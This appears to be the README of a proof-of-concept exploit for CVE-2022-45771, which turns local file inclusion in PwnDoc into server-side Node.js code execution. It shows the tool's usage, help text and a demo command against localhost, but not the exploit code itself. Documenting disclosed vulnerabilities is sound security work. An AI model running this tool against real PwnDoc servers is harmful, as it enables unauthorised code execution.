Pwndoc local file inclusion to remote code execution of Node.js code on the server, discovered by @yuriisanin

Features

• Custom Node.js code to execute server-side using --payload-file
• Cleanup after exploit

Requirements

• An admin account on the PwnDoc instance

Usage

$ ./CVE-2022-45771-Pwndoc-LFI-to-RCE.py -h
CVE-2022-45771 Pwndoc-LFI-to-RCE v1.1 - by @podalirius_

usage: CVE-2022-45771-Pwndoc-LFI-to-RCE.py [-h] -u USERNAME -p PASSWORD -H HOST [-P PORT] [-v] [--http] [-f PAYLOAD_FILE]

Poc of CVE-2022-45771 Pwndoc-LFI-to-RCE

options:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        Pwndoc username
  -p PASSWORD, --password PASSWORD
                        Pwndoc password
  -H HOST, --host HOST  Pwndoc ip
  -P PORT, --port PORT  Pwndoc port
  -v, --verbose         Verbose mode. (default: False)
  --http                HTTP mode. (default: False)
  -f PAYLOAD_FILE, --payload-file PAYLOAD_FILE
                        File containing node.js code to run on the server.

Demonstration

./CVE-2022-45771-Pwndoc-LFI-to-RCE.py -u admin -p 'Admin123!' --host 127.0.0.1 --payload-file files/exploit.js

demo.mp4

References

• Issue pwndoc/pwndoc#401 by @yuriisanin
• https://www.youtube.com/watch?v=jffBkEdF7RY